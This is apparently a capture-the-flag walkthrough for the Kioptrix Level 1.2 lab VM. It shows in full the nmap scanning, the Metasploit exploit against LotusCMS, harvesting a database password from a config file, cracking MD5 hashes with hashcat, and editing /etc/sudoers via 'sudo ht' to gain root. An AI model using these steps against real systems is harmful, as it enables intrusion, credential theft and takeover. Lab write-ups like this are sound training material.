Kioptrix: Level 1.2 (#3)

Note: As described in Kioptrix page, don't forget to add target IP to kali's hosts file.

Find the target IP: nmap 172.16.219.0/24

Probe service: nmap -sV -sC 172.16.219.170

root@kali:# nmap -sV -sC 172.16.219.170

Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-17 01:05 PST
Nmap scan report for 172.16.219.170
Host is up (0.000084s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:0C:EA:83 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds

Navigate to 172.16.219.170 , there's a login page http://172.16.219.170/index.php?system=Admin

Note that the "Proudly Powered by: LotusCMS" text in the bottom of the login box.

Googled LotusCMS found there's a Metasploit module for it.

msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(multi/http/lcms_php_exec) > set RHOST 172.16.219.170
RHOST => 172.16.219.170
msf exploit(multi/http/lcms_php_exec) > set URI /index.php?system=AdminURI => /index.php?system=Admin
msf exploit(multi/http/lcms_php_exec) > exploit

meterpreter > ls
Listing: /home/www/kioptrix3.com
================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   4096   dir   2011-04-15 06:21:17 -0700  cache
40777/rwxrwxrwx   4096   dir   2011-04-14 09:24:17 -0700  core
40777/rwxrwxrwx   4096   dir   2011-04-14 09:24:17 -0700  data
100644/rw-r--r--  23126  fil   2011-04-14 09:23:13 -0700  favicon.ico
40755/rwxr-xr-x   4096   dir   2011-04-14 08:32:31 -0700  gallery
100644/rw-r--r--  26430  fil   2011-04-14 09:23:13 -0700  gnu-lgpl.txt
100644/rw-r--r--  399    fil   2011-04-14 09:23:13 -0700  index.php
40777/rwxrwxrwx   4096   dir   2011-04-14 09:24:17 -0700  modules
40777/rwxrwxrwx   4096   dir   2011-04-14 09:24:17 -0700  style
100644/rw-r--r--  243    fil   2011-04-14 09:23:13 -0700  update.php

Under gallery folder, there's a gconfig.php file. Print the file content, found the following creds:

    $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

Use the creds "root" and "fuckeyou" to login to http://kioptrix3.com/phpmyadmin/

Then navigate to the SQL tab I am able to run any sql queries. From web interface I found the database gallery have a table named dev_accounts.

Or list all tables using query: SELECT * FROM information_schema.tables

dev_accounts table has the following info:

Now it's time to crack the password. Hashcat doesn't work on my kali, so I used john. But john can only crack one hash. Then I tried to use the offensive security customized kali. It worked!

root@kali:~/Downloads# hashcat -m 0 h.txt /usr/share/wordlists/rockyou.txt --force
……

5badcaf789d3d1d09794d8f021f40f0e:starwars                 
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

SSH as dreg, found that dreg is not a sudo user. SSH as loneferret, there're two files under current folder. The CompanyPolicy.README file mentioned use "sudo ht" to edit files. Got error when running "sudo ht".

loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.

Run export TERM=xterm and then run sudo ht. After run the editor, press F3 to open files. Open the /etc/sudoers file and append /bin/sh to user loneferret's line. This will allow user loneferret running /bin/sh without a password.

loneferret@Kioptrix3:~$ sudo /bin/sh
# whoami
root
#

==== Manual injection ===

results matching ""

    No results matching ""